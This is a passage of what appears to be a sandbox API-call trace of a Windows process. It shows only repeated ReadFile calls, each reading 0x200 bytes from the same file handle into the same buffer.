	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.166] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.167] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.168] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.169] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
	[0098.170] ReadFile (in: hFile=0x248, lpBuffer=0x205fd48, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x205ff50, lpOverlapped=0x0 | out: lpBuffer=0x205fd48*, lpNumberOfBytesRead=0x205ff50*=0x200, lpOverlapped=0x0) returned 1
